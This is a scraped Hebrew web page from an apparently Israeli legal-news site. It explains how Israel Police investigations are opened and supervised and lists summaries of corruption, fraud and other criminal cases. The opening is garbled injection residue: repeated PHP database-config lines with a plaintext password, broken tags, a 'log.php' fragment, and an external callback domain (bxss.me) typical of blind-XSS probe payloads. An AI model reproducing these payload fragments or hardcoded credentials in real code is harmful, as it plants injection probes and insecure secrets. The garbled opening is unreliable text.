$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> חקירות משטרה
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

משטרת ישראל חוקרת

תאריך: 22/07/2010 18:12   מחבר: מערכת האתר

משטרת ישראל מופקדת על אכיפת החוק ובטחון הפנים במדינת ישראל. סמכות המשטרה לפעול כאחת מזרועות האכיפה נגזרת מפקודת המשטרה המפרטת את היעוד, הסמכות והתפקידים שעיקרם: מניעת עבירות וגילוין, תפיסת עבריינים והבאתם לדין, קיום הסדר הציבורי וביטחון הנפש והרכוש ושמירה על האסירים המרצים עונשם בבתי המעצר והכלא.

חקירות המשטרה מנוהלות ומפוקחות על ידי אגף חקירות ומודיעין. בראש האגף עומד קצין בדרגת ניצב.

החקירות במשטרת ישראל נפתחות בדרך כלל בעקבות הגשת תלונה על ידי קורבן עבירה או בעל עניין אחר. כל אזרח רשאי לפנות לתחנת המשטרה הקרובה למקום מגוריו ולהגיש את התלונה. לאחר הגשתה נבחנת התלונה על ידי הגורמים המקצועיים בתחנה ושם מתקבלת החלטה אם קיימת עילה חוקית לפתוח בחקירה. אם מחליטים שכן, התלונה עוברת לטיפול היחידות הרלבנטיות לפי תחום התמחותן ומיקום ביצוע העבירות המיוחסות כעולה מכתב התלונה.

עבירות קלות נחקרות בדרך כלל על ידי החוקרים בתחנות המקומיות. עבירות חמורות מסוג פשע כגון: סחר בסמים, התפרצויות, תקיפות, שוד, רצח וגרימת חבלות חמורות יחקרו על ידי צוות חקירה מיוחד שהוקם במרחב או על ידי היחידות המרכזיות הכפופות למפקדי המחוזות השונים.

כאשר מדובר על חקירות של עובדי ציבור ופשיעה בינלאומית החקירות מועברות לטיפול היחידות הארציות, הכפופות ישירות לראש אגף חקירות ומודיעין. עבירות תנועה, תאונות עם נפגעים, פגע וברח יחקרו על ידי מחלקת החקירות המסונפת לאגף התנועה במטה הארצי.

החקירות לא נפתחות תמיד בגין הגשת תלונה רשמית. לפי החוק, אם נודע למשטרה על ביצוע עבירה או על כוונה לבצע פשע, מחובתה להפעיל את כל האמצעים המודיעיניים והחקירתיים העומדים לרשותה כדי למנוע את הפשע ולחקור את מתכנניו ומבצעיו.

המידע המעלה חשד לביצוע עבירות פליליות יכול שימצא בכתבת תחקיר בכלי התקשורת ו/או בדוח מבקר המדינה. אם מתברר למבקר שממצאי הביקורת מעלים חשד לביצוע עבירות פליליות הוא יעביר הממצאים לידיעת היועץ המשפטי לממשלה וזה יחליט לאחר בחינת החומר אם להעביר להמשך חקירת משטרה או לא.

מפלגי המודיעין בכל אחת מיחידות החקירה השונות אמונים על איסוף שיטתי ומזדמן של מידע ממקורות גלויים וחסויים לפי תוכנית איסוף תקופתית שמוגדרת על ידי האגף.

אם מתקבל מידע שעל פניו מעלה חשד לביצוע עבירות פליליות, רכזי המודיעין וקציני האיסוף וההערכה, יפעילו את המקורות והאמצעים להעשרת האיסוף עד להבשלתו לצורך פתיחה בחקירה גלויה. בלא מעט מקרים, איסוף המידע המתמשך לא מקים תשתית שיש בה לפתוח בהליכי חקירה ומעצר כנגד החשודים, כמתחייב מהוראות הפרוצדורה הפלילית.

עם השנים למד הציבור לדעת כי המשטרה "אוהבת" לבצע חקירות להן יש רוח גבית מצד כלי התקשורת השונים. בדרך כלל מדובר בחקירות של אישי ציבור בכירים או של פשיעה אלימה במיוחד, שלה השלכות חברתיות בעלות משמעות עמוקה. בתיקים מסוג זה, הפרקליטות מלווה את היחידות והצוותים החוקרים, מנחה אותם בהיבט החוקי ובהשלמות הנדרשות לצורך גיבוש כתב אישום שיעמוד במבחן בתי המשפט וירשיע את הנאשמים.

קיראו מידע ומאמרים נוספים באתר
פרשת הולינלד - טייקוני נדל"ן לטשו עיניים למתחם התיירותי הולילנד וביקשו להקים עליו מגדלי מגורים ומרכז מסחרי. לזירוז ההליכים וקבלת היתרי בנייה, שילמו על פי חשד המשטרה, שוחד לבעלי תפקידים בעירית ירושלים ובמוסדות התכנון והבנייה. הפרשה נחשפה על ידי עד מדינה
דני דנקנר - חשד לניגוד עניינים - לפי חקירת המשטרה חשוד דני דנקנר מקבלת הלוואה מאיש עסקים טורקי בעת שכיהן כיו"ר ועדת ההשקעות של בנק הפועלים. קיים חשד שניגוד העניינים העולה מהתקשרות עסקית זו יכול ופגע באינטרס של הבנק.
עידו סמואל ויוסי שובל - חשד להונאת לקוחות - עידו סמואל ויוסי שובל נעצרו על ידי מפלג הונאה של מחוז תל אביב בחשד להוצאת כספים במרמה מלקוחות תמימים שהשקיעו אצלם את כספם. החשודים ניפקו דוחות פיקטיביים על תוצאות ההשקעה ושילשלו את הכסף של הלקוחות לכיסם.
מבקר המדינה: רשלנות ממשית בהאזנות סתר בחקירת חיים רמון - מבקר המדינה, מיכה לינדנשטראוס, פרסם דו"ח חריף נגד התנהלות הפרקליטות והמשטרה ב"פרשת הנשיקה" של השר לשעבר חיים רמון. בין היתר מצא המבקר ליקויים משמעותיים בכל הנוגע לטיפול בהאזנות הסתר בתיק, שמקורם בכשלים אישיים של ארבעת הממונים על החקירה.
יעקב ויינרוט הואשם וזוכה מעבירות של מתן שוחד לשוקי ויטה - בחודש דצמבר 2009 הוגש כתב אישום נגד עו"ד יעקב וינרוט ושוקי ויטה, לשעבר סמנכ"ל ברשות המיסים. וינרוט מואשם במתן שוחד בגין מתן שירותים משפטיים לויטה ללא תמורה של ממש ואילו ויטה בתגובה כרת הסכמי מס מיוחדים ומטיבים עם לקוחותיו של וינרוט
עו"ד יוסף סלובניק הושעה לצמיתות מלשכת עורכי הדין - עורך הדין יוסף סלובניק הושעה לצמיתות מחברותו בלשכת עורכי הדין לאחר שנמצא אשם בגניבת כספי לקוחו. סלובניק גורר אחריו אישומים והרשעות רבות מעברו בגין שליחת יד בכספי לקוחותיו וכן בעבירות נוספות.
דמיטרי מלכיאל חשוד בהונאה באמצעות תרגיל עוקץ מתוחכם - תרגיל "עוקץ" חדש ומקורי נחשף בחודשים האחרונים בצפון הארץ. בעיתונות הרוסית פורסמו מודעות המציעות הלוואות נוחות על ידי בנק מסד. לקבלת פרטים נוספים פורסם מספר טלפון להתקשרות. אנשים התקשרו והתברר להם שנפלו קורבן לתרגיל הונאה
זוכו הנאשמים בפרשת הלבנת הון בבנק הפועלים - בית המשפט המחוזי בתל אביב זיכה את הנאשמים בפרשת הלבנת הון בסניף הירקון של בנק הפועלים. השופט מתח ביקורת חריפה על המדינה המאשימה וקבע שבמחדליה הקימה את הבסיס לזיכוי בנימוק של הגנה מן הצדק.
עונש מאסר ליניב עדרי שהצית מסעדה כדי לזכות בכספי הביטוח - יניב עדרי וקרוב משפחתו הורשעו ונדונו למאסר בפועל בגין הצתת המסעדה "המפגש הלוהט" שהייתה בבעלות עדרי כל זאת כדי לזכות במרמה בכספי ביטוח בסך 200 אלף שקל.
יואב גלנט יצא נקי מחקירת הזיוף ולא נבחר לרמטכ"ל - יצירת "מסמך גלנט" והדלפתו לחדשות ערוץ 2 נועדה לסכל החלטת ברק למנות את יואב גלנט לרמטכ"ל הבא בניגוד לדעתו של גבי אשכנזי. החקירה ניקתה גם את גלנט מכל חשד וברק בגיבוי היועץ המשפטי לממשלה, הביא את מועמדות גלנט לאישור הממשלה.
צחי הנגבי זוכה מעבירות מרמה והפרת אמונים אך הורשע בעדות שקר - בית המשפט זיכה ברוב דעות את צחי הנגבי ומנכ"ל משרדו הרשקוביץ מעבירות מרמה והפרת אמונים ושוחד בחירות אך הרשיע אותו ברוב דעות בעדות שקר. הנגבי ממתין להחלטת בית המשפט בעניין הקלון הנוגע להרשעתו בעדות שקר.
כתב אישום והכרעת דין מזכה בשני אישומים וזיכוי בשלישי לאולמרט - לפי כתב האישום שהוגש נגד רייצ'ל ריסבי אולמרט הנחה אותה ואת זקן להשיג בדרכי רמייה ומצגים כוזבים מימון כפול ומשולש לנסיעותיו לחו"ל . את עודפי המימון ניצל לתשלום עבור נסיעות בני משפחתו לחו"ל
עורך דין אהוד גנות הורשע בעבירות של גניבה בידי מורשה וזיוף - עורך דין אהוד גנות הורשע על פי הודאתו בעסקת טיעון בעבירות של גניבה בידי מורשה וקבלת דבר במרמה מלקוחותיו שהפקידו אצלו בנאמנות כספים בהם עשה שימוש לצרכיו הפרטיים.
בית המשפט העליון דחה ערעורם של השוטרים מנהריה - בית המשפט העליון דחה ערעורם של השוטרים מנהריה שביקשו לנקום בעבריין מיכאל מור ועל כך הורשעו במחוזי ונגזר עליהם עונש של שנת מאסר.
יהודה עליאש בכיר בקופת חולים מאוחדת נעצר בחשד למעילת ענק - הוארך מעצרו של יהודה עליאש מנהל אזור ירושלים מטעם קופת חולים מאוחדת בחשד לקשירת קשר עם קרובי משפחתו להוצאת כספים במרמה
יוגש כתב אישום נגד עורך דין סיני גלבוע - הפרקליטות הודיעה לעו"ד סיני גלבוע על כוונתה להגיש נגדו כתב אישום בכפוף לשימוע בחשד לקבלת שוחד, מרמה והפרת אמונים והלבנת הון בעת שכיהן כסגן ראש עיריית פתח תקווה
הנשיא קצב הורשע באונס, מעשה מגונה בכוח, הדחה בחקירה - בתום שנה של דיונים בבית המשפט הורשע הנשיא פה אחד בביצוע מעשה אונס , מעשה מגונה בכוח הטרדה מינית ושיבוש הליכי חקירה
שבע שנות מאסר בפועל נגזרו על עו"ד ירדנה נילמן בגין גניבה - עו"ד נילמן ירדנה שהתמנתה לשמש אפוטרופוס לחולים, מוגבלים וקטינים הורשעה בגניבת כספים שמגיעים להם ונידונה לשבע שנות מאסר.
הוגש כתב אישום נגד אהרן קליין ועמוס בוחניק בגין הוצאת כספים במרמה - הוגש כתב אישום נגד אהרן קליין ועמוס בוחניק בחשד להוצאת כספים במרמה מאנשי עסקים לאחר שהציגו בפניהם מצג כוזב על פיתוחים טכנולוגיים פרי פיתוחם
הוגש כתב אישום נגד עורך דין גור פינקלשטיין - פינקלשטיין גור היה היזם של הקמת בניין לכת הסיינטולוגיה ביפו. שוטה חובל מהפיקוח בעיריית תל אביב הורה על הפסקת עבודות הבינוי במבנה עקב חריגות. בעקבות הצו שהוצא פינקלשטיין בא חשבון איתו ושלח תמורת תשלום עובדים במקום לפגוע בו.
בועז חכים וציון בבא שוטר לשעבר הורשעו בהונאת פונזי - בית המשפט הרשיע את השוטר לשעבר ציון בבא ובעל פיצוצייה מבת ים, בועז חכים שקשרו קשר להונות אזרחים תמימים בשיטת פונזי, תוך ניצול האמון שנתנו בהם ובהבטחתם לספק להם תשואות גבוהות עבור השקעתם מה שהוכח שתכנון מוקדם להוציא מהם כספים במרמה.
העליון דחה את ערעורו של אברהם הירשזון - בית המשפט העליון דחה את ערעורו של אברהם הירשזון על עונש המאסר בן חמש שנים שגזר עליו בית המשפט המחוזי בעקבות הרשעתו בגניבת כספים במספר פרשיות שונות.
מרגלית צנעני מואשמת בסחיטה באיומים - הוגש כתב אישום נגד מרגלית צנעני ומיכאל חזן שפעל בשליחותה כדי לאיים ולסחוט את האמרגן אסף אטדגי על מנת שזה יקיים את הסכם הבוררות שנחתם בין הצדדים היריבים ואותו לפי הנטען סרב אטדגי לקיים
אלי רייפמן נידון לארבע שנות מאסר בפועל - בית המשפט המחוזי בתל אביב גזר על אלי רייפמן מייסד חברת אמבלייז מאסר בפועל של ארבע שנים בגין ביצוע עבירות של קבלת דבר במרמה בנסיבות מחמירות, זיוף מסמך ושימוש במסמך מזויף